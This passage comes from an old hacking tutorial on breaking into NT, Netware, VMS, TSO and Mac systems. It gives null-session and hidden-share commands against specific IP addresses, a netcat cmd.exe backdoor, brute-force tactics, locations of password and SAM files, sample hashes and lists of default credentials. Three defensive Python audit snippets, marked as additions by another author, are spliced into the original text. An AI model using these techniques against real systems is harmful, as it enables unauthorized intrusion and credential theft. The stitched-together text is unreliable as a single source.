means. A code of 00 means a NetBEUI name. The first entry, srv3 <00>, tells us that this is
a name, and the Unique tells us that it's the name of that computer. You now have the
NetBEUI (Windows) name of that box. The second entry, r7labs <00>, is also a
name, and the Group tells us that this is the domain name. This is the Windows domain
name - not necessarily the Internet domain name. The srv3 <20> entry means that this
machine has file sharing enabled - which means you'll probably find shares with a 'net
view.' Appendix C of this text has explanations for each hex code you'll find with an
nbtstat.
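As an added example (mine, not part of the original text), here is a small Python parser for an nbtstat -A table like the one above that applies the hex-code rules just described, so an admin can see at a glance what each of their own hosts is advertising. The sample table is constructed; treating <03> Unique names as Messenger-service entries (where the logged-on user name shows up) is a known NetBIOS fact the text does not state.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample, modelled on the table shown in the text (not captured from a real host).
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
SRV3           <00>  UNIQUE      Registered
R7LABS         <00>  GROUP       Registered
SRV3           <20>  UNIQUE      Registered
SRV3           <03>  UNIQUE      Registered
GHOST          <03>  UNIQUE      Registered
"""

# One table row: name, <hex suffix>, UNIQUE/GROUP, status.
ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)", re.IGNORECASE)


@dataclass
class HostSummary:
    computer_name: Optional[str] = None   # <00> UNIQUE
    domain: Optional[str] = None          # <00> GROUP (Windows domain/workgroup name)
    file_sharing: bool = False            # <20> UNIQUE registered = file sharing enabled
    logged_on_users: List[str] = field(default_factory=list)  # <03> UNIQUE, not the host name


def parse_nbtstat(text: str) -> List[Tuple[str, str, str, str]]:
    """Extract (name, suffix, type, status) rows from nbtstat -A output; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, suffix.upper(), kind.upper(), status))
    return rows


def summarize(rows) -> HostSummary:
    """Apply the suffix rules from the text: 00/Unique = host, 00/Group = domain, 20 = sharing."""
    s = HostSummary()
    registered = [r for r in rows if r[3].lower() == "registered"]
    for name, suffix, kind, _ in registered:
        if suffix == "00" and kind == "UNIQUE":
            s.computer_name = name
        elif suffix == "00" and kind == "GROUP":
            s.domain = name
        elif suffix == "20" and kind == "UNIQUE":
            s.file_sharing = True
    # <03> UNIQUE is the Messenger service: the host name and each logged-on user register here.
    for name, suffix, kind, _ in registered:
        if suffix == "03" and kind == "UNIQUE" and name != s.computer_name:
            s.logged_on_users.append(name)
    return s


def findings(s: HostSummary) -> List[str]:
    """What an admin would want flagged when one of their hosts answers nbtstat from outside."""
    out = []
    if s.file_sharing:
        out.append(f"{s.computer_name}: file sharing (<20>) reachable, check share permissions")
    if s.logged_on_users:
        out.append(f"{s.computer_name}: logged-on user names leaked via <03>: "
                   + ", ".join(s.logged_on_users))
    if s.domain:
        out.append(f"{s.computer_name}: domain name {s.domain} disclosed")
    return out


if __name__ == "__main__":
    summary = summarize(parse_nbtstat(SAMPLE_NBTSTAT))
    for line in findings(summary):
        print(line)
```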
Another way to connect to an NT machine is to add it to your lmhosts file (in your
windows directory). Open a file called lmhosts (with no extension), and edit like so:
ip_address netbeui_name #pre
where ip_address is the IP address of your target, and netbeui_name is the name you got
from the nbtstat. For an example, look at your lmhosts.sam file (but don't use this file,
only use lmhosts with no file extension). Next you want to load the file into your
NetBEUI memory cache, with this command:
nbtstat -R
Now, go to your Start button, then Find, then computer, and type in the NetBEUI name of
the computer. An icon representing that computer will appear - right click on it and then
click 'explore' to connect to the machine. This is the GUI way to connect to NT machines.
Again, if you're not using NT, you won't be able to log in.
Once connected, you'll want to see what kind of permissions you have. Create and erase a
file. Make and delete a directory. You could have only read permissions, or you may have
read and write (read files and modify them). Standard DOS commands work, and any
mapped network drives will also appear in Windows Explorer as if it were on your local
machine (similar to UNIX NFS).
One thing that sets NT apart from UNIX is its Client/Server-ness. If you telnet to a
UNIX box and run a program, it will be run on that machine, using its CPU and RAM. If
you map a network drive to an NT server and run a command, it will be launched and run
on your computer, using your resources. So if you upload an exploit, map a drive, and
double-click on the sploit with Explorer, the exploit will run on your computer. It is
possible to get programs to run on that machine instead of your own, which will be
explained in the 'Unbelievable...A Hacker!' section.
Hacking NT
Most of the time shares will be user level, or at least password-protected user level. And if
you aren't logged in, net views will report no open shares (why would the system tell you
what folders are shared to someone who hasn't logged in?). So you have a few options.
You could get the password hashes and crack them with L0phtCrack (explained later).
Or, you could use Brute Force: write a batch file that connects to the share, then spits
passwords from a wordlist (available all over). If you aren't skilled at writing batch files,
get yourself a good DOS book, and at least find out about commands and DOS
environment variables. You could make yourself quite a powerful brute force share-cracker
batch file in under 20 lines. I personally use VB for brute force engine making.
Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares,
use a share scanner such as Legion. But most likely you won't be able to see (let alone
map to) anything at first. So here are some steps to take in breaking into an NT server.
Follow steps one, two, and three in the 'Getting Started - Your First Night as a Newbie'
section. Once done, you should have a handful of usernames, as well as know what ports
are open on what machines, and what services are running on those ports. If port 21 is
open, it's probably IIS. If you can get in anonymously (username 'ftp' with any password),
try using this command:
cd /c
Once in a while a misconfiguration will bring you to the system's actual root directory
(whereas with normal anonymous access you can't go very high in the hierarchical
filesystem). This usually doesn't work, but is worth a shot. Use one of the fingerprinting
methods explained earlier to determine the webserver (if port 80 is open). Both IIS and
FrontPage are plagued with vulnerabilities. How to exploit these is explained in the
'System Exploits' section.
Any share whose name ends in a dollar sign is hidden, and won't show up in a net view or if
you use the GUI approach to viewing shares. To connect to them, you only need to refer
to them by name. Common hidden shares are:
c$        The entire C: drive
d$        The entire D: drive (if there is another hard disk or partition)
admin$    The %systemroot% (\winnt) directory
ipc$      Inter-Process Communications - not really a share (explained shortly)
By default, all drives are shared but hidden, as is the winnt directory. So to map your drive
e: to your target's c: drive, you'd simply type:
net use e: \\38.57.128.2\c$ password /user:username
Or you could do it the GUI way (with nbtstat or Map Network Drive).

Another way to hack in would be to put a Trojan on the server. Netcat is a program you
can use to bind programs to ports. One way to allow yourself a back door to a system is
to bind cmd.exe (similar to Win9X's command.com) to a port. NCX and NCX99
(available at technotronic.com) do this for you. Once you bind cmd.exe to port 80 or 99,
you can telnet in and get a DOS prompt (how very UNIX-like!).
Your ultimate goal is probably to get the password file. Unfortunately, NT stores the
password hashes in the registry. Sometimes you'll find a backup copy in
\winnt\system32\repair\sam._, but if not you'll have to resort to other methods of getting
them. Once you do, you'll use L0pht Crack to crack them.
A few programs will also aid you in hacking into NT networks. Ogre is a very useful NT
scanning utility. It will scan ports, net view, and nbtstat every machine in an NT network.
NAT is also a powerful Brute Force engine, and can log into NT networks even from a
Win9X machine (though to log in yourself, you'll still need NT). For more advanced NT
vulnerability exploits, read the 'System Exploits' section. For more NT commands that
you'll need, type 'net' at a command prompt. For more info on each net command, type:
net command /?
NAT is a great tool for BF-ing NT machines too. Take your list of valid usernames and
put them into a file for NAT to use, and use a small password file (the one that comes
with NAT is good - add a few password guesses of your own too). Also, the latest version
of Legion (2.1) will not only scan for shares, but will attempt to brute force any it finds, if
the user so desires. Both programs are made by the Rhino9 team, NT hacking experts.
Here's a newer vulnerability in NT. Remember the hidden ipc$ share? As I said before, it's
not really a share, per se: it's not a shared folder. It's a channel used by NT Domain
Controllers (PDCs and BDCs) to exchange network information with each other. And a
hacker could theoretically use this 'channel' to break in. Remember how groups work in
NT. Like UNIX, certain files and folders are accessible only to certain users or groups.
One built-in group of NT is called 'Everyone', which encompasses anyone logged into the
domain. It's possible for someone to connect to the IPC share, and masquerade as an NT
Domain Controller, and by doing so, become a member of the 'Everyone' group.
Without even logging in. Consider the following.
C:\hacker_toolz>net view \\202.53.198.1
System error 5 has occurred
Access Denied
NT Server 202.53.198.1 just told us to go to hell since we haven't logged in. Heh - watch
this:
C:\hacker_toolz>net use \\202.53.198.1\ipc$ "" /user:""
We just connected to the IPC share with a username of null (meaning none: /user:""), and
a password of null (""). Also, notice that we didn't specify a drive letter to map IPC to,
since its not a standard share. What we've done is connect to 202.53.198.1's IPC share in
the exact same way another Domain Controller wishing to exchange data would. And that
makes us part of 'Everyone.' It thinks we're another server in its domain. Now watch:

C:\hacker_toolz>net view \\202.53.198.1
Shared resources at 202.53.198.1:

Share        Description
-----------------------------------
folder1      Mngr's Folder
usenet       NNTP
printer      Printer
Now that we're part of 'Everyone', the server just spilt its guts to us, when seconds ago it
wouldn't. This only works if the server you're net view-ing is configured to allow the
Everyone group to browse it. Can we map network drives to these shares and explore?
There's a good chance of that. You can also use the user2sid and sid2user tools (available
at www.hackingexposed.com) to glean usernames (which makes brute force much easier).
This is a well known vulnerability that is easily solved, but you'll find this tactic works on
lots of NT Servers.
One last note on NT hacking. The WINS (Windows Internet Naming Service) protocol is
responsible for translating NetBEUI names (Net BIOS uses computer names instead of
addresses) to IP addresses. To look at the WINS configuration of any computer, use the
nbtstat command. Furthermore, the file lmhosts on any windows machine will act as a
mini WINS table if WINS itself is disabled (TCP/IP properties under Control Panel >
Network).
Novell Netware
UNIX machines still claim most machines on the Net. NT is catching up, and between the
POSIX and Win32 platforms, you won't find much else on the Internet. Once in a great
while, however, you just might run into a completely different operating system. Novell
Netware used to be the biggest Client/Server Network Operating System around, and
rivals NT to this day. So just in case you run into one of these foreign systems, here is a
little info on Novell Netware.
NTs core protocol (integrated with Net BIOS) is SMB. Netware, on the other hand, uses
NCP (Netware Core Protocol) as its main protocol for serving files. Netware has been
around for quite some time - the first version was command-line and sat on top of DOS.
Now GUI clients exist for it, and version 5.X has been released. Like Windows NT,
computing is not centralized (like UNIX), and resources are distributed among the
network. One computer may be a print server, on might be a mail server, another a file
server. The thing that makes Netware unique is what's called the NDS database, or Novell
Directory Services. The NDS is a little comparable to an NT network's PDC's registry. It
is a hierarchical representation of the entire network. Everything on the network (users,
servers, printers, logon scripts, etc.) is represented by an appropriate object in the NDS
database. At the root of the NDS tree is the object 'root,' similarly to a root directory.
Stemming from the root object, are one or more 'organizational' objects, comparable to
subdirectories. Inside these objects can be more organizational objects, or what are
known as 'leaf' objects, comparable to files. These leaf objects are what make up the
conceptual network. Leaves include user objects, representing users of the network,
server objects, representing servers, and so on. The organizational units exist for no other
reason than to conceptually organize the network. The whole idea of an NDS is sometimes
hard to grasp at first, due to its being so abstract, but it greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to
an NDS object's location, you refer to its context. Paths start with root at the left, such as:
C:\Winnt\programs\file.ini
Contexts, on the other hand, start with the root at the right, such as:
.user22.market.UAS
where user22 is the object we are referring to. We don't need to specify root because it's
assumed that root is always after the last organizational unit listed. The context above
specifies the user22 object, which is in the organizational unit 'market,' which resides in the
organization 'UAS.' When referring to objects absolutely (full context), you must start the
context with a period (.), and separate each entry with a period also. Now if your current
working context was .market.UAS (same concept as a current working directory), you
could refer to user22 relatively (just as in UNIX or DOS filesystems) with simply:
user22
with no period.
Now, Netware networks usually have GUI interfaces. If you ever connect to a Novell
server over the Net, you will have to navigate it from the command line, though, unless you
want to download GUI clients from www.novell.com. You map network drives to Netware
volumes (similar to a Windows share) much as you would to an NT machine, with the MAP
command. You change your context and navigate the NDS with the CX command.
In order to do this, you will need to get your hands on a Netware client. You can get a
free command-line client at www.novell.com. Client32 is a good one.
Now each user in a Novell network is represented by a user leaf object on the NDS tree.
So to log in as user22 whose object is in the marketing.UAS container, you have to log in
as:
.user22.marketing.UAS
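To make the context rules above concrete (absolute contexts start with a period, relative names are resolved against the current working context, root is implied after the last container), here is an added Python example of my own, not from the text or from Novell's client; the helper names and the sample contexts are constructed.

```python
from typing import List, Tuple


def parse_context(ctx: str) -> Tuple[bool, List[str]]:
    """Split an NDS context into its components, leftmost (the named object) first.

    Returns (is_absolute, components). An absolute context starts with a period;
    [Root] is never written, it is implied after the last component.
    """
    if not ctx or ctx.endswith(".") or ".." in ctx:
        raise ValueError(f"malformed context: {ctx!r}")
    is_absolute = ctx.startswith(".")
    body = ctx[1:] if is_absolute else ctx
    components = body.split(".")
    if any(not c for c in components):
        raise ValueError(f"empty component in context: {ctx!r}")
    return is_absolute, components


def resolve(name: str, current_context: str) -> str:
    """Return the full (absolute) context for `name`, the form you would log in with.

    A name that already starts with a period is absolute and is returned normalized.
    A relative name is placed in front of the current working context, the mirror
    image of appending a relative path after the current directory.
    """
    is_absolute, parts = parse_context(name)
    if is_absolute:
        return "." + ".".join(parts)
    cur_abs, cur_parts = parse_context(current_context)
    if not cur_abs:
        raise ValueError("current context must be absolute (start with a period)")
    return "." + ".".join(parts + cur_parts)


def containers(full_context: str) -> List[str]:
    """Container objects holding the named object, innermost first (root is implied)."""
    is_absolute, parts = parse_context(full_context)
    if not is_absolute:
        raise ValueError("need an absolute context")
    return parts[1:]


if __name__ == "__main__":
    cwc = ".market.UAS"                        # constructed current working context
    print(resolve("user22", cwc))              # .user22.market.UAS
    print(resolve(".admin.UAS", cwc))          # .admin.UAS
    print(containers(".user22.market.UAS"))    # ['market', 'UAS']
```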
Mapping drives to Netware volumes (a volume is just like an NT share) is done in one of
two ways. You can either specify the server name you are connecting to physically, such
as:
map x: servername/volumename
or by its NDS object, such as:
map x: server_nds_object:volumename
When trying to break into a Novell server on the net, with say, an IP address of
212.14.6.2, you would issue this command (with a Novell client in a DOS box):
map x: 212.14.6.2/datafiles
where datafiles is the volume you want to connect to. It is beyond the scope of this text
to get into great detail about all the commands and innerworkings of Netware, so feel free
to jump into a Netware book. Really.
Hacking Netware
Breaking into Netware servers is just like hacking into anything else: you need to know as
much as you can about the OS. Plenty of exploits exist for Netware - www.hackers.com
has a lot. So, if you want to crack a Novell system, complete steps one, two, and three of
the 'Getting Started - Your First Night as a Newbie' section. Try to Brute Force the
usernames you find. Also, there are a few public volumes attached to each Netware server
by default.
Logon    This is accessible to everyone - logged on or not.
Public   This is accessible to anyone logged on, no matter who.
Sys      This is the system volume - phun to explore.
Here are some commonly used login names and passwords for Netware:
Username
Admin
Backup
Guest
Netware
Novell
Public
Remote
Server
Staff
Supervisor
System1
Tape
Test
User
Visitor

Password
operator, supervisor, sysadm
visitor, user
NetWare

admin, operator, sysadm, supervis, manager


backup
testuser
guest

Also, brute force programs and password crackers exist for Netware by the truckload, as
well as exploits and other handy Novell hacking utilities. If you're serious about hacking a
Novell system, familiarize yourself with them.
Miscellaneous OS's
Most of the systems you'll find will be some sort of UNIX. A lot will also be NT. And a
few might be Netware. And that's about all you'll find while exploring the Internet. But if
you find yourself trying to break into a machine via its dialup modem, you might be
connecting to an older mainframe. Twice in my life, though, I have telnetted to a machine
to find the unfamiliar logon screen of a mainframe as well. Also, you might (which, by the
way, happened to me) target a network for some reason - to find out that it's a network of
Macs (ugh)! I'm not going to spend much time on OSs other than NT and UNIX, but
here's a little info on some others you might run into. For more info, hit a search engine
or get a book.
MacOS
I hate Macs. Any OS without a command-line isn't worth my time, and in my humble
opinion, should be forced upon AOL users. Hackers generally like the OSs that they hack
into - which is why they stay up until four in the morning trying to break in. But you
might have a more specific motive to breach the security of a particular network, and if it's
a Mac network, you'll have to learn a little bit about it. Just don't admit to it.
Macs connect using the proprietary protocol Appletalk. Surprisingly, this protocol is
routable. Each subnet (a term that will confuse most any Mac user) is called a Zone.
Appletalk can be run over IP, for the purpose of talking to TCP/IP networks. If the
Appletalk network in question is connected to the Net, at least the proxy server has to
have this dual protocol capability. If you ever find a Mac machine on the Net with a valid
IP address, it is running Appletalk over TCP/IP.
The protocol used to share resources is called AppleShare. AppleShare is (at its
application level) similar to NetBEUI. Folders are flagged as shared, and thereby made
available to the rest of the network. Some are password protected, and require a
username and password. Mac sysadmins tend not to be too security-savvy, though, and
Guest access is usually possible. To access these folders, your computer will need to
speak Appletalk, and you'll need a client to connect to AppleShare servers. TSSTalk
(available at www.thursby.com) is a free program that will configure both requirements for
you. All you have to do with it is enter the IP address of the Mac, and it will show up in
your Network Neighborhood. Double-click the computer icon and you're off to hacking.
VMS
VMS (Virtual Memory System) was a popular mainframe OS a few years back. It runs on
VAX machines, and rivaled UNIX in its popularity for hackers to try to crack. Finding a
VAX on the Net is an extremely rare find, but finding one on the end of a dialup link isn't
so. One thing that is stereotypical about VMS is its potential for security. If the VAX
sysadmin knows what he's doing (and rarely do complete idiots run OSs as complex as
VMS), the system can be very secure, including extensive logging, encryption schemes,
restrictive privilege rules, and even hacker traps.
Many VAX machines are interconnected via MultiNet, making the VAX network a bit
more client/server. The prompt of a VMS system looks something like:
$DISK3:[user21]
Where DISK3 means you're currently on the third disk (most VAXs have multiple disks,
just like you can have a C: hard disk and a D: hard disk) and you are in the directory
user21, which is probably a home directory. Once at a prompt, you can issue a variety of
commands. Telnet and ftp both work, and function like their counterparts in the UNIX
world. You can use dir or directory to get a listing of your present working directory.
If you do, you might see something like:
Text4 [users, user21]
App2 [users, admin]
Where text4 is the name of the file, and the brackets represent permissions. User21 owns
the file text4, and is in the Users group. With the command cdup you can jump to the
root directory of your disk, at which point your prompt would look like:
$DISK3:[000000]
And if you wanted to view a file, you'd use the type command, just like in DOS. Rm
deletes files, like in UNIX. Rmdir removes an entire directory, and mkdir creates them.
You must have the appropriate permissions in your PWD to do this, of course. If ever you
try to read, copy, move, run, or delete a file, you might get a message like:
%RMS-E-PRV, insufficient privilege or file protection violation
Meaning you don't have the privileges to access the file in question.
VAX machines on the Net will have very few ports open, so your hacking options will be
limited. And if you dial into the mainframe, that's (obviously) your only point-of-entry.
Brute force is the only for-sure way to get that initial account and further hack a VAX.
Here is a list of commonly used usernames and passwords for VMS:
Username     Password
-----------------------------------------------
SYSTEM       OPERATOR, MANAGER, SYSTEM, SYSLIB
OPERATOR     OPERATOR
SYSTEST      UETP, SYSTEST, TEST
SYSMAINT     SYSMAINT, SERVICE, DIGITAL
FIELD        FIELD, SERVICE
GUEST        GUEST, (unpassworded)
DEMO         DEMO, (unpassworded)
TEST         TEST
DECNET       DECNET

TSO
I include IBM's TSO only because I've seen a couple on the Net, and dialed into a few.
You'll know a TSO machine by either its login prompt:
IKJ56700A ENTER USERID:
Or by the way it responds to a bad login:
IKJ56943I USERID (whateveryoutyped) NOT AUTHORIZED TO USE TSO
And if you do login, you'll either be presented with a menu system or a command prompt.
Old colleges sometimes connect TSO machines to their network to hold legacy databases,
such as books and the like. If you're presented with a menu system, issue a variety of
obscure (and long) commands to break out into a prompt. If you enter an invalid
command, you'll usually get an error message that says something about an unrecognized
transaction. Here is a list of commonly used TSO login names and passwords.

Username
Admin
Guest
Init
Maint
Systest
Test1
Tso

Password
adm

test
test

There are many more mainframe operating systems out there. Most of them, though,
you'll never see, especially on the Net, since computing has become more decentralized
and client/server over the years. Many hackers won't even bother with these dinosaurs. If
you ever run into one, though, and want to explore, get yourself an older hacking text,
like The Neophyte's Guide to Hacking (where I got some of the stuph above), or
something similar. Hackers.com has a few older texts like this. I'll personally stick to
UNIX and NT.
"Unbelievable - a Hacker!"
The object of your hack will most likely be to obtain root, i.e. total control over the
network. With a rootshell (any shell with root privileges, such as the superuser account)
you can read, write, and execute everything on the network (or at least that particular
computer). To obtain root, you'll probably have to break in with some other account first.
From there you can run a local exploit, download the password file, or whatever. If it's an
NT machine that you're hacking, you probably want either the Administrator's account, or at
least to have a Trojan or RAT installed on it to give you total control. In this section I'll go
into the various means of getting root (or equivalent).
Brute Force
Brute Force is the simplest hacking technique, yet oftentimes provides results. When all
else fails, you might be left with no other option than a brute force attack. This means
hurling usernames and passwords at a system until it cracks. Use the list of commonly used
UNIX combinations supplied with this text. Spend time trying to crack individual
email addresses. Honestly, you haven't made a full-hearted brute force attempt until
you've spent at least two or three hours doing nothing but trying different combinations.
Since UNIX login prompts won't tell you if you've used a valid login name or not, narrow
it down! Here is a quick list on how to obtain usernames:

If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of
usernames. Type HELP for more commands.
Any email addresses on the network's website will be valid usernames.
Look at the /etc/passwd file of any UNIX machine (including one of your own).
There are tons of default usernames that get used all the time.
NT: using a null IPC session and the SID tools (explained in the Elite Hacker
Tactics section) you'll be able to get every username for a PC or domain.

When you first target a system, before going into finding exploits and the like, spend a few
minutes BF-ing some common accounts. Wouldn't you be pissed if you spent hours
compiling an exploit to find that the root password was simply 'root'?
Also, you could write a program (or shell script if you have a UNIX box yourself) to spit
usernames and passwords from a dictionary wordlist file at the system (available all around
the Net, usually in supplement to password crackers).
If you want to become eleet eventually, you'll need to learn at least a little about at least a
few programming languages. The easiest (yet still effective) language to learn, especially
for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly
telnetted to my target and spat usernames (from a list that I compiled that I knew to be
valid usernames) and passwords (from a huge dictionary file), and redirected all output to
my screen and a log file. I'm no programming expert, but with an hour of coding and
another of debugging, all I had to do was sit back and watch as my little proggie
automated a brute force attack with decent speed. Ready-made BF progs exist too.
Unsecure is a decent one for FTP and Telnet login prompts. NAT is great for NT. Just
remember - brute force will always work, eventually.
Local Xploits
A local sploit (exploit) is a program that exploits some security bug inherent in the
operating system, and will greatly increase your access levels, oftentimes to root. A local
exploit (as the name implies) is something you'll have to run on the system you're hacking.
If it's UNIX, you can telnet in and run it. If it's NT, you'll have to use one of the following
methods to run the exploit (remember that running a program on a remote NT machine
from a mapped network drive will launch it on your computer).
Run it with a Trojan such as Netbus or Back Orifice.
Put the exploit in the cgi-bin directory if its a webserver, and request it with your
browser.
Use the scheduling (AT) command to run it - Admins only.
Use NCX or NCX99 to telnet in and run it.
Put it in a batch file and have some other user run it.
There are many exploits out there, for many different NOSs, daemons, programs, and
modules. One of the most common of these is the Buffer Overflow (also known as a
Stack Overflow). This is a technique in which the OS's buffer (a container of
memory set aside by the OS for data it's working with) is filled with garbage. When the
buffer is "filled," the last string on the stack can be executed, to do such things as initiate a
root shell. To use any local exploit, of course, you need to have an account that you can
log into FTP with and upload the exploit from your computer to the server you want to
run it on. Or if you only have telnet access, you can use vi (or some other text editor) and
rewrite the exploit. Use cc or gcc to compile it if it's not already (most UNIX exploits are
not compiled, nor are most NT exploits). You then need to log in via telnet and run it, or
launch it on the remote NT machine as explained above. Exploits are OS and version
specific, and it's sometimes hard to find one for a specific one (they are usually available all
over the Internet). See the 'System Exploits' section for a list of more common
vulnerabilities.
If you're on a UNIX system with a non-root account, you have access to hundreds of
programs. Chances are, at least one of these is vulnerable. Look up exploits for that
flavor of UNIX, and you'll most likely find at least one. To find out if a certain program
exists on that machine, type one of these at a command prompt:
which program-name
whereis program-name
You'll be told where the program resides, if it exists. To find a program or file on an NT
machine that you have a drive mapped to, type:
dir /s file-name
while on the network drive.
If you can't find a vulnerability, you might want to try your hand at cracking the
password file.
The Password File
Some hackers try to get this file before even using exploits, though getting it may involve
using them anyways. In the /etc directory (UNIX) is a file called passwd, which holds
every password for every user, along with some other information. Unfortunately for you,
the passwords are encrypted. This means you'll have to download the password file and
crack it on your own computer. You'll use a password cracker such as John the Ripper for
this. Another security feature system administrators will use to keep hackers out is
password shadowing. If shadowing is done (and it oftentimes is), all the encrypted
passwords will be replaced with *'s or x's. These are not crackable. The real password
hashes (encrypted passwords) are most likely in a different file. Here is a short list of
where to find the real password file if /etc/passwd is shadowed.
UNIX Version        Path
-------------------------------------------
AIX 3               /etc/security/passwd
BSD 4.3             /etc/master.passwd
ConvexOS 10         /etc/shadpw
ConvexOS 11         /etc/shadow
Digital UNIX        /etc/tcb/aa/user/
HP-UX               /.secure/etc/passwd
IRIX 5              /etc/shadow
Linux               /etc/shadow
SunOS 5             /etc/shadow
System V r4.0       /etc/shadow
UNICOS              /etc/udb
Though the unshadowed file could potentially be anywhere. Use the grep command and
look for files with the word 'root' to find potential candidates. You may not always have
read access to the real file - you may have to do some stair stepping, or use a local exploit.
To give you an idea of what to look for, here is an encrypted password file:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Here is a shadowed password file:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
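As an added illustration of the two files above (my own code, not from the text), here is a Python audit an admin can run over a passwd file to confirm it is actually shadowed: it parses the seven-field lines, reports any hash still sitting in the password field, any empty password field, and any extra UID 0 account. The sample files are constructed from the page's example lines, plus one made-up misconfigured line.

```python
from typing import Dict, List

# Constructed samples, modelled on the two example files shown in the text.
UNSHADOWED = """\
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
"""

SHADOWED = """\
root:*:0:1:Operator:/:/bin/csh
admin:x:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
"""

# Constructed: the shadowed file plus one deliberately bad line ("toor" is made up here).
MISCONFIGURED = SHADOWED + "toor::0:0:second superuser:/:/bin/sh\n"

# Placeholders meaning "the real hash lives in the shadow file" (or the account is locked).
# x and * are the markers the text mentions; ! and !! are the Linux lock markers.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict]:
    """Parse passwd-format lines into dicts; blank and comment lines are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        user, pw, uid, gid, gecos, home, shell = fields
        entries.append({"user": user, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def is_shadowed(entries: List[Dict]) -> bool:
    """True only when every password field holds a shadow/lock marker, never a hash or nothing."""
    return all(e["pw"] in SHADOW_MARKERS for e in entries)


def audit_passwd(entries: List[Dict]) -> List[str]:
    """Findings an admin should act on; an empty list means the file looks as it should."""
    findings = []
    for e in entries:
        if e["pw"] == "":
            findings.append(f"{e['user']}: empty password field, no password needed to log in")
        elif e["pw"] not in SHADOW_MARKERS:
            findings.append(f"{e['user']}: hash present in passwd ({len(e['pw'])} chars), "
                            "file is not shadowed")
        if e["uid"] == 0 and e["user"] != "root":
            findings.append(f"{e['user']}: UID 0 account other than root")
    return findings


if __name__ == "__main__":
    for label, text in (("unshadowed", UNSHADOWED), ("shadowed", SHADOWED),
                        ("misconfigured", MISCONFIGURED)):
        entries = parse_passwd(text)
        print(f"{label}: shadowed={is_shadowed(entries)}")
        for f in audit_passwd(entries):
            print("  " + f)
```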
At any rate, when you crack these, depending on the encryption strength and passwords
used, you should get a handful of valid usernames and passwords. If you didn't get the
root password, you could also use one that belongs to the same group as root (such as
admin or sysop). One note about root: a lot of systems are set up so that root cannot log
in remotely (from outside). This means you'll have to log in as someone else, then use the
'su' command and enter the root password (su is used for system administrators to jump
around from account to account, and stands for 'substitute user.')
NT passwords are a little different. They are kept in the registry, not just in a file like UNIX,
which makes them harder to get your hands on. They are encrypted as well. There are a
few ways to get them.
Do a core dump (RAM dump) since the registry is in memory. This is not easy
for beginners, and surgically removing the hashes from memory requires
debugging knowledge.
Do a remote registry dump (with L0pht Crack). If the NT machine allows for
remote registry sharing and you have NT at home, you can extract the passwords
from your target's registry over the Net.
Get the sam._ file. If the Admin backs up the registry using rdisk.exe, the
password hashes may be stored in \winnt\system32\repair or somewhere similar.
Remote registry dumps and importing the SAM hive (sam._) into L0pht Crack require
NT. Windows NT registries are made up of Hives. Each hive is stored in a *._ file. The
hive with the passwords in it is SAM._. So why don't you just download it like a UNIX
password file? Because NT is set up not to let anyone see, copy, or modify the SAM hive.
Your only hope besides the methods listed above is to boot your target machine into an
alternative OS, like Linux or DOS, then get the file (NT protects the file, DOS and Linux
don't). This is difficult over the net. It is, however, possible. Also, you'll need a
program that will allow DOS (which uses the FAT filesystem) or Linux (which uses the
EXT2 filesystem) to access the partition that SAM._ is on (which is in an NTFS filesystem
partition). Once in a while, though, you may come across copies of the hives (all with ._
extensions) stored in a directory like 'repair' or 'reg_backup'. With all the work that it
takes to get NT passwords, you're usually better off trying some other method of getting
in, like exploits.
Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides
of that computer. To find out how each port is a potential point of infiltration for you,
you'll need to find out a little more about each protocol. Do some research. For now, I've
provided a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it is as if you are directly connected to and part of
that network. One of the first things you should try is the "front door." Telnet to the
machine, and try some commonly used username and password combinations. Next, try
each of the email addresses you've collected. About one in twenty people are dumb
enough to use their first name or login name as their password (assuming they are allowed
to set their own password), so try that too. Chances are this won't work (though it's a
good idea to try anyways), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with 'ftp' as a
username and no password). When you do so, your home directory will be something like
/usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you're
currently in), it will say that your pwd is / (root). This means that you are in a restricted
shell. So if after logging in anonymously you cd (change directory) to lib, you will be told
that you are in /lib, while you'll really be in /home/ftp/lib, or whatever. System admins like
to put /bin's and /etc's in the ftp directory, and in the /etc will be a password file - but don't
get your hopes up - 99% of the time it's shadowed. Anonymous ftp access is really only
helpful if you can download useful information.
If you see an open finger port, this could be the break you were looking for. Use a finger
client and do a generic query (no usernames) to possibly get a list of users logged on.
Next try putting an @ symbol in front of the domain you are querying, for a list of all
users, logged on or not. For specific user information, type in username@domain.
